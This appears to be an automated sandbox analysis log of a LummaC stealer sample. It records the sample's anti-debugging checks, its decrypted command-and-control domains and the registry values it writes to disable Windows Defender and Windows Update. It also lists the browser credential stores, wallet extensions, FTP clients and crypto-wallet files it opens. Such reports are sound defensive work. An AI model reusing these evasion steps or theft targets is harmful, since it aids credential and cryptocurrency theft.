          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeFile opened: SIWVID
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0118C216 rdtsc 10_2_0118C216
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          LummaC encrypted strings found
          Source: file.exe, 00000006.00000003.1283399914.0000000005190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: scriptyprefej.store
          Source: file.exe, 00000006.00000003.1283399914.0000000005190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: navygenerayk.store
          Source: file.exe, 00000006.00000003.1283399914.0000000005190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: founpiuer.store
          Source: file.exe, 00000006.00000003.1283399914.0000000005190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacedmny.store
          Source: file.exe, 00000006.00000003.1283399914.0000000005190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: thumbystriw.store
          Source: file.exe, 00000006.00000003.1283399914.0000000005190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: fadehairucw.store
          Source: file.exe, 00000006.00000003.1283399914.0000000005190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crisiwarny.store
          Source: file.exe, 00000006.00000003.1283399914.0000000005190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: presticitpo.store
          Source: AU963ROPSBOYUMXP3FF.exe, 0000000A.00000002.1653687899.00000000011D7000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: ZProgram Manager@
          Source: file.exe, 00000006.00000002.1508470162.0000000000967000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: .BProgram Manager
          Source: AU963ROPSBOYUMXP3FF.exe, AU963ROPSBOYUMXP3FF.exe, 0000000A.00000002.1653687899.00000000011D7000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: ZProgram Manager
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Disable Windows Defender notifications (registry)
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior
          Disable Windows Defender real time protection (registry)
          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1Jump to behavior
          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1Jump to behavior
          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\NotificationsRegistry value created: DisableNotifications 1Jump to behavior
          Disables Windows Defender Tamper protection
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRegistry value created: TamperProtection 0Jump to behavior
          Modifies windows update settings
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptionsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdatesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocationsJump to behavior
          Source: file.exe, 00000006.00000002.1509191410.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1397574155.000000000130A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1507177296.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1387091683.000000000130A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7160, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVWJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVWJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
